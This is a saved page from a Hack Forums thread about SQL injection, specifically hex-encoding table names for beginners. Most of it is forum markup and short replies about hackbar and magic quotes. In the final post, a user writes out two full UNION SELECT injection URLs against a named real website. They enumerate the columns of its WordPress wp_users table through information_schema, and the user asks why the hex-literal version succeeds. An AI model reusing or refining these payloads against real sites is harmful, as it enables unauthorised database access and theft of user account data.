href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,150<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">213</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_24705725"><blockquote><cite><span>(07-21-2012 05:44 PM)</span>Prominent Wrote: <a href="http://www.hackforums.net/showthread.php?pid=24705523#pid24705523" class="quick_jump">►</a></cite>Don't forget that you can also do hex encoding via hackbar.</blockquote><br>Yep, hackbar is very useful... I advertised it <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"> in my today's tip<br><a href="http://www.hackforums.net/showthread.php?tid=2698410" target="_blank">http://www.hackforums.net/showthread.php?tid=2698410</a></div><div class="post_meta" id="post_meta_24705725"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=24705725" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid24712961" id="pid24712961"></a><table class="tborder" style="margin-top: 5px; " id="post_24712961" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">07-21-2012, 10:47 PM <span id="edited_by_24712961"><span class="smalltext">(This post was last modified: 07-21-2012 10:48 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=895241">-zerocool</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=24712961#pid24712961">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=895241"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/avatar_895241.jpg" alt="" height="100" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=895241"><span class="group29">-zerocool</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 84<br>Posts: 980<br>Joined: Jul 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=895241"><strong class="reputation_positive">156</strong></a><br><span style="white-space:normal; width: 100%;"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_24712961">when
 mq ,as or mres is on this thing will also not work thats why we need 
hex value. . .nonethless if they r not without hex its fine. . .</div><div class="post_meta" id="post_meta_24712961"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://ultimatehackingarticles.blogspot.com/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=895241" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=24712961" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26359013" id="pid26359013"></a><table class="tborder" style="margin-top: 5px; " id="post_26359013" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-12-2012, 05:17 AM <span id="edited_by_26359013"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;pid=26359013#pid26359013">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1229248"><span class="group2">Polite</span></a></span></strong> <img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 10<br>Posts: 203<br>Joined: Mar 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1229248"><strong class="reputation_positive">8</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26359013">May I know, why <a href="http://thenonprofitcareercoach.org/events?event_id=-12%20union%20all%20select%201,group_concat%28column_name%29,3,4,5,6,7,8,9,10,11,12,1%E2%80%8B3,14,15,16,17,18,19,20,21,22,version%28%29,24,25,26,27,28%20from%20information_schem%E2%80%8Ba.columns%20where%20table_schema=database%28%29%20and%20table_name=concat%28%270x%27,hex%28%27%E2%80%8Bwp_users%27%29%29--" target="_blank">http://thenonprofitcareercoach.org/event...users'))--</a> is not working, where as,<br><br><a href="http://thenonprofitcareercoach.org/events?event_id=-12%20union%20all%20select%201,group_concat%28column_name%29,3,4,5,6,7,8,9,10,11,12,1%E2%80%8B3,14,15,16,17,18,19,20,21,22,version%28%29,24,25,26,27,28%20from%20information_schem%E2%80%8Ba.columns%20where%20table_schema=database%28%29%20and%20table_name=0x77705f757365727%E2%80%8B3--" target="_blank">http://thenonprofitcareercoach.org/event...73657273--</a> working fine?</div><div class="post_meta" id="post_meta_26359013"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1229248" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704&amp;replyto=26359013" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (3):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=2686704&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=2686704" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=2686704">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=2686704" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2686704&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-2686704.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="SQLi%20-%20tip%20for%20newbies%20-%20converting%20to%20hex%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->